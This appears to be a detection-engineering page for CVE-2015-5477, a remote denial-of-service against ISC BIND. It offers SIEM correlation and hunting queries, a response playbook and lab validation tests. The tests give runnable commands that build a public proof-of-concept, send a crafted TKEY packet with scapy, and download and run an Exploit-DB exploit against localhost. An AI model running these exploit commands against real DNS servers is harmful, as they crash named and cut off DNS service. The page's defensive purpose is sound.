CVE-2015-5477

ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477)

Impact Last updated:

Detects exploitation of CVE-2015-5477, a critical data-processing error in ISC BIND's handling of TKEY queries. A remote, unauthenticated attacker can send a specially crafted DNS packet containing a TKEY record that triggers a REQUIRE assertion failure in named (buffer.c / db.c), causing the daemon to exit (INSIST/REQUIRE assertion). Because a single malformed packet crashes named, this is a trivially weaponizable remote DoS against any recursive or authoritative BIND server. Detection focuses on DNS TKEY query records (qtype 249) directed at named, correlated with abnormal named process termination / assertion-failure log lines and service restarts. Listed in CISA KEV.

Vulnerability Intelligence

KEV — Known Exploited

What is CVE-2015-5477 ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477)?

ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477) (CVE-2015-5477) maps to the Impact tactic — the adversary is trying to manipulate, interrupt, or destroy your systems and data in MITRE ATT&CK.

This page provides production-ready detection logic for ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477), covering the data sources and telemetry it touches: DNS query logs, Linux Syslog (named daemon), Microsoft Defender for DNS. The queries below are rated critical severity at high confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic
Impact
Microsoft Sentinel / Defender
kusto
let tkeyQueries = DnsEvents
| where TimeGenerated > ago(1h)
| where QueryType =~ "TKEY" or QueryType == "249"
| summarize TkeyCount = count(), ClientIPs = make_set(ClientIP, 50) by bin(TimeGenerated, 5m), Computer;
let namedCrashes = Syslog
| where TimeGenerated > ago(1h)
| where ProcessName =~ "named"
| where SyslogMessage has_any ("REQUIRE", "assertion failure", "buffer.c", "RUNTIME_CHECK", "exiting (due to fatal error)")
| summarize CrashCount = count(), Msgs = make_set(SyslogMessage, 20) by bin(TimeGenerated, 5m), Computer;
tkeyQueries
| join kind=leftouter namedCrashes on Computer, $left.TimeGenerated == $right.TimeGenerated
| extend Suspicious = (TkeyCount > 0 and CrashCount > 0)
| project TimeGenerated, Computer, TkeyCount, ClientIPs, CrashCount, Msgs, Suspicious
| where TkeyCount > 0

Correlates inbound DNS TKEY (qtype 249) queries observed in DnsEvents with ISC BIND named assertion-failure / fatal-exit messages in Syslog within the same 5-minute window. TKEY queries that coincide with named crashes are the CVE-2015-5477 signature.

critical severity high confidence

Data Sources

DNS query logs Linux Syslog (named daemon) Microsoft Defender for DNS

Required Tables

DnsEvents Syslog

False Positives

  • Legitimate use of TKEY for GSS-TSIG dynamic DNS updates in Active Directory-integrated or Kerberos environments.
  • DNS protocol fuzzing or vulnerability scanning performed by an authorized internal security team.
  • named restarts triggered by configuration reloads or administrative maintenance unrelated to malformed packets.

Sigma rule & cross-platform mapping

The detection logic for ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477) (CVE-2015-5477) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the following logsource:

logsource:
  category: network_connection
  product: windows

Browse the community-maintained Sigma rules for this technique:


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Send malformed TKEY query to named (PoC tkill)

    Expected signal: Inbound DNS packet with a TKEY (qtype 249) record to port 53; named log line 'buffer.c:... REQUIRE(...) failed' followed by 'exiting (due to fatal error)'.

  2. Test 2Craft TKEY query with scapy

    Expected signal: DNS query event with query_type=TKEY/249 captured in BIND query log or network DNS sensor.

  3. Test 3Exploit-DB PoC 37721 TKEY assertion crash

    Expected signal: TKEY DNS query to the target; named assertion-failure entry and process termination in system logs.


Response Playbook

Triage

  1. Confirm whether the affected host runs ISC BIND (named) and verify its version against the ISC advisory AA-01272; BIND 9.1.0 through 9.9.7-P1 and 9.10.x before 9.10.2-P2 are vulnerable.
  2. Review named logs (/var/log/messages, journalctl -u named) for 'REQUIRE', 'assertion failure', 'buffer.c', or 'exiting (due to fatal error)' entries and correlate their timestamps with inbound TKEY (qtype 249) queries.
  3. Identify the source IP(s) of the TKEY queries from DNS query logs or packet capture and determine whether they are internal (possible GSS-TSIG) or external/untrusted.
  4. Determine whether named terminated and whether a supervisor (systemd/monit) auto-restarted it, indicating a crash-loop DoS pattern.

Containment

  1. Apply the ISC patch / upgrade named to a fixed release (9.9.7-P2, 9.10.2-P3, or later) on all affected servers.
  2. As an interim mitigation, block or rate-limit inbound DNS packets containing TKEY records at the perimeter firewall/IPS and restrict recursion to trusted clients.
  3. If a crash-loop is active, place the resolver behind a redundant/failover DNS service to maintain availability while patching.

Evidence Collection

  1. Capture the raw malicious packet(s) via tcpdump (e.g. 'tcpdump -i any -w tkey.pcap port 53') for the offending source IP and preserve the pcap.
  2. Collect named logs, the core dump (if coredumps enabled), and systemd/service restart timestamps for the incident window.

Escalation Criteria

  • ! TKEY-triggered named crashes observed from untrusted/external source IPs, confirming active exploitation of CVE-2015-5477.
  • ! Repeated crash-restart cycles causing sustained DNS outage, or exploitation targeting internet-facing authoritative/recursive servers.

Investigation Guide

Forensic Artifacts

  • > named syslog/journal entries containing 'REQUIRE ... failed' / 'assertion failure' referencing buffer.c or db.c.
  • > Packet capture of the inbound DNS query bearing a TKEY (type 249) record.
  • > named process exit codes and systemd restart records in journalctl.

Tuning Guidance

In Active Directory / Kerberos environments, TKEY is used legitimately for GSS-TSIG secure dynamic updates, so alert only when TKEY queries coincide with named assertion failures/crashes or originate from untrusted source IPs. Allow-list known DDNS update clients and internal domain controllers. Once all named instances are confirmed patched to a fixed release, downgrade severity to informational and retain the hunting query for regression monitoring.


Hunting Queries

Surfaces all hosts receiving TKEY (qtype 249) DNS queries and the source IPs sending them over the past week to baseline legitimate GSS-TSIG use versus anomalous probes.

Hunting — KQL
kql
DnsEvents | where TimeGenerated > ago(7d) | where QueryType =~ "TKEY" or QueryType == "249" | summarize count() by ClientIP, Computer, bin(TimeGenerated, 1h) | sort by count_ desc
Hunting — SPL
spl
index=dns sourcetype="isc:bind:query" (query_type="TKEY" OR query_type="249") | stats count by src_ip, host | sort - count

Atomic Red Team Tests

Test 1 Send malformed TKEY query to named (PoC tkill)
linux

Uses the public CVE-2015-5477 proof-of-concept to send a crafted TKEY DNS query that triggers a REQUIRE assertion failure in a vulnerable BIND named instance. LAB ONLY against an authorized vulnerable server.

Command

bash
git clone https://github.com/robertdavidgraham/cve-2015-5477 /tmp/cve-2015-5477 && cd /tmp/cve-2015-5477 && make && ./tkill 127.0.0.1 53

Cleanup

bash
rm -rf /tmp/cve-2015-5477; systemctl restart named 2>/dev/null || service named restart 2>/dev/null

Expected Telemetry

Inbound DNS packet with a TKEY (qtype 249) record to port 53; named log line 'buffer.c:... REQUIRE(...) failed' followed by 'exiting (due to fatal error)'.

Expected Detection

KQL/SPL correlation rule fires on TKEY query co-occurring with named assertion-failure/crash within the 5-minute window.

Test 2 Craft TKEY query with scapy
linux

Constructs and sends a DNS query containing a TKEY record using scapy to generate TKEY telemetry (qtype 249) for detection validation. Against a vulnerable named this crashes the service.

Command

bash
python3 -c "from scapy.all import *; pkt=IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname='attacker.example',qtype=249)); send(pkt)"

Cleanup

bash
systemctl restart named 2>/dev/null || service named restart 2>/dev/null

Expected Telemetry

DNS query event with query_type=TKEY/249 captured in BIND query log or network DNS sensor.

Expected Detection

Detection rule records the TKEY query; if named terminates, the crash-correlation branch escalates the alert.

Test 3 Exploit-DB PoC 37721 TKEY assertion crash
linux

Runs the Exploit-DB 37721 proof-of-concept against an authorized lab BIND server to reproduce the CVE-2015-5477 remote DoS and validate crash telemetry.

Command

bash
curl -s https://www.exploit-db.com/raw/37721 -o /tmp/37721.py && python2 /tmp/37721.py 127.0.0.1

Cleanup

bash
rm -f /tmp/37721.py; systemctl restart named 2>/dev/null || service named restart 2>/dev/null

Expected Telemetry

TKEY DNS query to the target; named assertion-failure entry and process termination in system logs.

Expected Detection

Correlation detection flags the TKEY-query-plus-named-crash sequence as critical CVE-2015-5477 exploitation.

Related Detections

Tactic Hub